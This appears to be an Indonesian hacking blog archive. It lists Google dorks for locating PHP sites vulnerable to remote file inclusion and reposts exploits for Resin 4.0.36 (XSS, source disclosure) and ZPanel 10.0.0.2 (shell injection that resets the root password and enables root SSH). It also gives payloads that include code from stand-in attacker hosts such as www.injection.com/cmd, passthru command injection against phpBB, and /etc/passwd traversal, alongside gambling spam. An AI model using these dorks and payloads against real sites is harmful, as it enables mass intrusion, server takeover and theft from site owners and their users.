Google Hack Easy Hacking: Remote File Inclusion

About Google Hack

Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results for information related to computer security. In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others, such as credit card numbers, social security numbers, and passwords. This filtering is performed by using advanced Google operators . While Google was the original tool of the Google hackers, many of the tactics and operators can be used on other search engines, such as MSN Search and Yahoo.

Template by:

Showing posts with label Remote File Inclusion. Show all posts

Showing posts with label Remote File Inclusion. Show all posts

Resin Application Server 4.0.36 XSS / Source Code Disclosure

Berbeda dengan vuln yang sebelumnya tentang ZPanel 10.0.0.2 Remote Command Execution Vulnerability kali ini dari 133day memposting Resin Application Server 4.0.36 XSS / Source Code Disclosure. Uraiannya bisa dibaca dibawah ini.

Resin Application Server 4.0.36 Cross-Site Scripting Kerentanan

Penyedia: Caucho Technology, Inc
Produk web page: http://www.caucho.com
Versi Terkena: Resin Web Profesional Dan Application Server 4.0.36

Ringkasan: Resin adalah Java Application Server untuk lalu lintas tinggi situs yang membutuhkan kecepatan dan skalabilitas. Ini adalah salah satu yang paling awal Java Server Aplikasi, dan memiliki teruji waktu karena rekayasa kecakapan.

Desc: Resin Aplikasi dan Web Server Plugin menderita XSS mengeluarkan karena kegagalan untuk benar membersihkan masukan yang disediakan pengguna untuk yang 'logout' GET parameter dalam 'index.php' skrip. XSS berbasis URI Masalah juga hadir dan kedua dari kerentanan dapat dipicu setelah user / admin login (post-auth). Penyerang dapat mengeksploitasi kelemahan ini untuk mengeksekusi HTML sewenang-wenang dan kode script di pengguna sesi browser.

Diuji pada: Resin Professional 4.0.36 (dibangun Fri, 26 Apr 2013 03:33:09 PDT)
Java HotSpot (TM) 64-Bit Server VM 23.3-b01
4 cpu, Windows 7 amd64 6.1

Kerentanan ditemukan oleh Gjoko 'LiquidWorm' Krstic
@ zeroscience

Penasehat ID: ZSL-2013-5143
Penasehat URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5143.php

Exploits

http://127.0.0.1:8080/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://127.0.0.1:8080/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

--

http://127.0.0.1:8080/resin-doc/viewfile/?file=index.jsp

http://127.0.0.1:8080/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp

http://127.0.0.1:8080/resin-doc/viewfile/?contextpath=/.&servletpath=&file=index.jsp

[+/-] Selengkapnya...

Google hack ZPanel 10.0.0.2 Remote Command Execution Vulnerability

Setelah beberapa hari yang lalu Google Hack posting tetang beberapa reviews tentang AGEN BOLA LIGABET88 PROMO BONUS 100% IBCBET SBOBET 368BET, anekahosting.com web hosting murah terbaik di indonesia dan Cari Uang lewat ekiosku.com kali ini akan mempublikasikan vuln dari salah satu web terkemuka yaitu 1337day tentang ZPanel 10.0.0.2 Remote Command Execution Vulnerability.

Salah satu anggota tim ahli kami (shachibista@gmail.com) yang ditugaskan untuk melakukan audit keamanan kode ZPanel telah menemukan follwoing kerentanan keamanan dengan ZPanel 10.0.0.2 yang akan memungkinkan orang untuk meningkat dengan accress akar dan mengakses server dengan siapa pun. itu audit keamanan menyatakan sebagai berikut:

Saya telah meninjau kode ZPanel dan ada remote serius kerentanan eksekusi di "Protect Directory" modul yang memungkinkan siapa pun dengan akses ke halaman (Administrator, Reseller dan Klien secara default) untuk mengeksekusi perintah sewenang-wenang pada shell karena tidak benar (tidak ada) melarikan diri dari masukan pengguna. Langkah-langkah berikut dapat diambil untuk mereproduksi mengeksploitasi:

1. Login as any user and visit

http://>/?module=htpasswd&selected=Selected&path=/

1a. In the "Username" field input (including the initial semicolon and

the final hash):

;/etc/zpanel/panel/bin/zsudo "echo 'newpassword'" "| passwd --stdin root" #

2. Type any password

3. Root password will be set to "newpassword"

4. Visit http://>/?module=htpasswd&selected=Selected&path=/

5. In the "Username" field (including initial semicolon and final hash):

;/etc/zpanel/panel/bin/zsudo sed '-i "s/#*\(PermitRootLogin\)/\1 yes

\#/" /etc/ssh/*hd*g' #

6. This will enable root login,

7. Satu dapat mengulangi proses yang sama untuk membuka port 22 melalui iptables (iptables-A INPUT-p tcp - dport 22-j ACCEPT) dan restart ssh Server (ini akan membutuhkan proses dua kali sebagai internal buffer ukuran perintah zsudo adalah 100 karakter)

Regards
Google Hack

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 22

modules/4nAlbum/public/displayCategory.php?basepath= modules/agendax/addevent.inc.php?agendax_path= modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= modules/coppermine/include/init.inc.php?CPG_M_DIR= modules/coppermine/themes/coppercop/theme.php?THEME_DIR= modules/coppermine/themes/default/theme.php?THEME_DIR= modules/mod_mainmenu.php?mosConfig_absolute_path= modules/My_eGallery/public/displayCategory.php?basepath= modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= myPHPCalendar/admin.php?cal_dir= nphp/nphpd.php?nphp_config[LangFile]= path_to_athena/athena.php?athena_dir= path_to_phpgreetz/content.php?content= path_to_qnews/q-news.php?id= pivot/modules/module_db.php?pivot_path= poll/admin/common.inc.php?base_path= pollvote/pollvote.php?pollname= protection.php?action=logout&siteurl= shoutbox/expanded.php?conf= sources/post.php?fil_config= vCard/admin/define.inc.php?match= yabbse/Sources/Packages.php?sourcedir= zentrack/index.php?configFile= phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 21

- -- HTTP Request -- http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_conf ig=../../../../../../etc/passwd or http://[target]/[phpGedView-directory]/editconfig_gedcom.php POSTDATA: gedcom_config=../../../../../../etc/passwd - -- HTTP Request -- Code impacted : editconfig_gedcom.php 61:if (empty($gedcom_config)) { 62: if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"]; 63: else $gedcom_config = "config_gedcom.php"; 64:} 65: 66:require($gedcom_config); The both GET/POST requets will work evenif PHP register_globals is Off. ------------------------------------------- II - PHP Injection (HIGH Risk no authentication needed) - -- HTTP Request -- http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BAS E_DIRECTORY=http://attacker&THEME_DIR=/ - -- HTTP Request -- Code impacted : [GED_File]_conf.php 123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"); 124:else { 125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/"; 126: require($THEME_DIR."theme.php"); 127: } The require call is only vulnerable when PHP register_globals is On. In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call. The attacker has to create on his web site a directory call themes/standard, and a file theme.php For example: theme.php = " ;?> and the request, will execute the phpinfo() command on the vulnerable target. 37. inurl:signup.php?usertype=pf http://www.contoh.com/common.inc.php?CFG[libdir]=http://www.geocities.com/k4k3_rgb/test?cmd ============================================================================= /phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_GET_VARS[sh]).%2527&sh=ls%20-al

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 20

/cgi-bin/site/session.cgi?page=links.html|cat /etc/passwd| /forums/viewtopic.php?t=4&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=dir%20.... /phpBB2/viewtopic.php?t=7&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd /forum/viewtopic.php?t=232&highlight=%2527.phpinfo().%2527 /viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= /index.php?file= /allinurl:/index.php?page= site:*.dk /allinurl:"pnphpbb2 /inurl:/allmyguest /allinurl:/index.php?file= site:*.dk /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= /phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_GET_VARS[sh]).%2527&sh=ls%20-al /forumlinux/viewtopic.php?t=29%20&highlight=%2527&highlight=%2527.passthru($HTTP_GET_VARS[CMD]).%2527&CMD=ls%20-al;

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 19

/modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2 /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum /include/write.php?dir= allinurl:/zboard/zboard.php interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS" /functions.php?include_path= "powered by: phpecard" modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery" components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/" /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 18

/class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3" /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks" /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/ administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring" administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm" help.php?css_path= inurlhplive site:.ru components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/" administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path= inurl:".de.*/com_linkdirectory" administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage" /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp" administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath= inurl:"com_mtree" modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/ /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/ /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat exthp

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 17

/phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat exthp /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=* /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang= /classes.php?LOCAL_PATH= "powered by siteframe" al_initialize.php?alpath= "Powered by AutoLinks Pro" /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/* /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov* /extensions/moblog/moblog_lib.php?basedir= "powered by pivot" /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2" components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests" /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery" /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf" /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook" /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1" inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script réalisé par BinGo PHP" /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h= inurl:"/com_mtree/"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 16

============================================================================= http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd? ==========================================================================

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 15

index.php?oldal= inurl:"index.php?oldal=*.php" index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php" index.php?pag= inurl:"index.php?pag=*.php" index.php?incl= inurl:"index.php?incl=" avatar.php?page= inurl:"avatar.php?page=" index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absol ute_path= "Mambo is A Free" index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absol ute_path= "Mambo is" index.php?p= inurl:"edu/index.php?p=*.php" /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/ index.php?x= inurl:"com/index.php?x=*.php" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date= administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" content.php?page= inurl:"*content.php?page=*.php" dministrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path= inurl:"com_linkdirectory" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components" modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 14

/classes/adodbt/sql.php?classes_dir= allinurl:adobt sitel enc/content.php?Home_Path= "powered by doodle cart" /classified_right.php?language_dir= inurl:classified.php phpbazar /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)" /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)" /embed/day.php?path= intitle:"Login to Calendar" /includes/dbal.php?eqdkp_root_path= "powered by EQdkp" /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2" /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base" /mcf.php?content= allinurl:"mcf.php" site:.de /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS" /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6" /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat" /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom" /main.php?sayfa= inurl:"main.php?sayfa=" /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= allinurl:com_extended_registration /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/" /header.php?abspath= "MobilePublisherPHP" components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository impex/ImpExData.php?systempath= intextowered by vbulletin /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3" administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository /tools/send_reminders.php?includedir= allinurl:day.php?date= /skin/zero_vote/error.php?dir= skin/zero_vote/error.php /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar /login.php?dir= allinurl:login.php?dir= /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php index.php?pageurl= inurl:"index.php?pageurl=*.php" /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 13

modules/My_eGallery/index.php?basepath= inurl:"My_eGallery" /modules/vwar/admin/admin.php?vwar_root= inurl:"vwar" index.php?loc= allinurl:.br/index.php?loc= administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage" /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php myevent.php?myevent_path= inurl:myevent.php /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp" myevent.php?myevent_path= inurl:"uk/myevent.php includes/functions.php?phpbb_root_path= powered by Integramod m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php? /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository show.php?path= inurl:fclick show.php?path= inurl:.ac.uk/fclick administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory" administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits" index.php?template= inurl:"index.php?" search.php?cutepath= inurl:"search.php?" show_news.php?cutepath= inurl:"show_news.php?" page.php?doc= allinurl:"page.php?doc=" administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 12

allinurl:"com_facileforms" site:.ar skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS" /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6" /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat" /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom" /main.php?sayfa= inurl:"main.php?sayfa=" /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration /addpost_newpoll.php?addpoll=preview&thispath= allinurl:"/ubbthreads/" /header.php?abspath= "MobilePublisherPHP" components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository impex/ImpExData.php?systempath= intext:powered by vbulletin /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3" administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository /tools/send_reminders.php?includedir= allinurl:day.php?date= /skin/zero_vote/error.php?dir= skin/zero_vote/error.php /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar /login.php?dir= allinurl:login.php?dir= /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php index.php?pageurl= inurl:"index.php?pageurl=*.php" /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system index.php?var= inurl:"index.php?var=*.php" index.php?pagina= inurl:"index.php?pagina=*.php" index.php?go= inurl:"index.php?go=" index.php?site= inurl:"index.php?site="

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 11

phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id=" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler" index.php?pagina= inurl:"index.php?pagina=*.php" index.php?id= inurl:"index.php?id=*.php" index1.php?= inurl:"index1.php?=*.php? index.php?site= inurl:"index.php?site=*.php" main.php?id= inurl:"main.php?id=*.php" content.php?page= inurl:"content.php?page=*.php" admin.php?page= inurl:"admin.php?page=*.php" lib/gore.php?libpath= inurl:"/SQuery/" SQuery/lib/gore.php?libpath= inurl:"/SQuery/" index2.php?p= inurl:"index2.php?p=*.php" index1.php?go= inurl:"index1.php?go=*.php" news_detail.php?file= inurl:"news_detail.php?file=*.php" old_reports.php?file= inurl:"old_reports.php?file=*.php" index.php?x= inurl:"index.php?x=*.php" index.php?nic= inurl:"index.php?nic=*.php" homepage.php?sel= inurl:"homepage.php?sel=*.php" index.php?sel= inurl:"index.php?sel=*.php" main.php?x= inurl:"main.php?x=*.php" components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks" index2.php?x= inurl:index2.php?x=*.php" main.php?pagina= inurl:"main.php?pagina=*.php" test.php?page= allinurl:test.php?page= components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop" akocomments.php?mosConfig_absolute_path= inurl:akocomments.php index.php?page= inurl:"edu/index.php?page=*.php" *.php?page= inurl:*.php?page=*.php"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 10

index.php?oldal= inurl:"index.php?oldal=*.php" index.php?lang=gr&file inurl:"index.php?lang=gr&file=*.php" index.php?pag= inurl:"index.php?pag=*.php" index.php?incl= inurl:"index.php?incl=" avatar.php?page= inurl:"avatar.php?page=" index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is" ndex.php?p= inurl:"edu/index.php?p=*.php" /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/ index.php?x= inurl:"com/index.php?x=*.php" index.php?mode= inurl:"com/index.php?mode=*.php" index.php?stranica= inurl:"index.php?stranica=" index.php?sub= inurl:"il/index.php?sub=*.php" index.php?id= inurl:"/index.php?id=*.php" index.php?t= inurl:"/index.php?t=*.php" index.php?r= inurl:"index.php?r=*.php" index.php?menu= inurl:"net/index.php?menu=*.php" index.php?pag= inurl:"com/index.php?pag=*.php" solpot.html?body= allinurl: "solpot.html?body" port.php?content= inurl:port.php?content=*.php" index0.php?show= inurl:index0.php?show=*.php" administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date= administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository /tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler" content.php?page= inurl:"*content.php?page=*.php" index.php?topic= inurl:"/index.php?topic=*.php" index.php?u= inurl:"/index.php?u=*.php" administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory" administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 9

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm" help.php?css_path= inurl:phplive site:.ru components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/" big.php?pathtotemplate= inurl:".de.*"big.php?" includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?" interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS" /functions.php?include_path= "powered by: phpecard" modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery" components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/" /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6" /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3" /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks" /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/ index2.php?to= inurl:"/index2.php?to=*.php" index.php?load= inurl:"/index.php?load=*.php" home.php?pagina= inurl:"home.php?pagina=" /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2 /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum /include/write.php?dir= allinurl:/zboard/zboard.php db.php?path_local= inurl:"db.php?path_local=" index.php?site= inurl:"index.php?site=" index.php?url= inurl:"index.php?url=" index.php?p= inurl:"index.php?p=" index.php?openfile= inurl:"index.php?openfile=" index.php?file= inurl:"index.php?file=" index.php?go= inurl:"index.php?go=" index.php?content= inurl:"index.php?content="

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 8

index.php?side= inurl:"index.php?side=" index.php?kobr= inurl:"index.php?kobr="index.php?pg= inurl:"index.php?pg=" index.php?doc= inurl:"index.php?doc=" index.php?l= inurl:"index.php?l=" index.php?a= inurl:"index.php?a=" index.php?principal= inurl:"index.php?principal=" index.php?show= inurl:"index.php?show=" index.php?opcao= inurl:"index.php?opcao=" index.php?conteudo= inurl:"index.php?conteudo=" index.php?meio= inurl:"index.php?meio=" index.php?inc= inurl:"index.php?inc=" index.php?c= inurl:"index.php?c=" index.php?rage= inurl:"index.php?rage=" index.php?arquivo= inurl:"index.php?arquivo=" index.php?nic= inurl:"index.php?nic=" index.php?x= inurl:"index.php?x=" components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:"com_mtree" index.php?place= inurl:"index.php?place=" index.php?show= inurl:"index.php?show=" index.php?dsp= inurl:"index.php?dsp=" index.php?dept= inurl:"index.php?dept=" index.php?lg= inurl:"index.php?lg=" index.php?inhalt= inurl:"index.php?inhalt=" index.php?ort= inurl:"index.php?ort=" index.php?pilih= inurl:"index.php?pilih=" principal.php?conteudo= inurl:"principal.php?conteudo=" main.php?site= inurl:"main.php?site=" template.php?pagina= inurl:"template.php?pagina=" contenido.php?sec= inurl:"contenido.php?sec=" index_principal.php?pagina= inurl:"index_principal.php?pagina=" template.php?name= inurl:"template.php?name=" forum.php?act= inurl:"forum.php?act=" home.php?action= inurl:"home.php?action="

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 7

home.php?pagina= inurl:"home.php?pagina=" noticias.php?arq= inurl:"noticias.php?arq=" main.php?x= inurl:"main.php?x=" main.php?page= inurl:"main.php?page=" default.php?page= inurl:"default.php?page=" index.php?cont= inurl:"index.php?cont=" index.php?configFile= inurl:"index.php?configFile=" index.php?meio.php= inurl:"index.php?meio.php=" index.php?include= inurl:"index.php?include=" index.php?open= inurl:"index.php?open= index.php?visualizar= inurl:"index.php?visualizar=" index.php?x= inurl:"index.php?x=" index.php?pag= inurl:"index.php?pag=" index.php?cat= inurl:"index.php?cat=" index.php?action= inurl:"index.php?action=" index.php?do= inurl:"index.php?do=" index2.php?x= inurl:"index2.php?x=" index2.php?content= inurl:"index2.php?content=" main.php?pagina= inurl:"main.php?pagina=" index.phpmain.php?x= inurl:"index.phpmain.php?x=" index.php?link= inurl:"index.php?link=" index.php?canal= inurl:"index.php?canal=" index.php?screen= inurl:"index.php?screen=" index.php?langc= inurl:"index.php?langc=" services.php?page= inurl:"services.php?page=" htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn=" 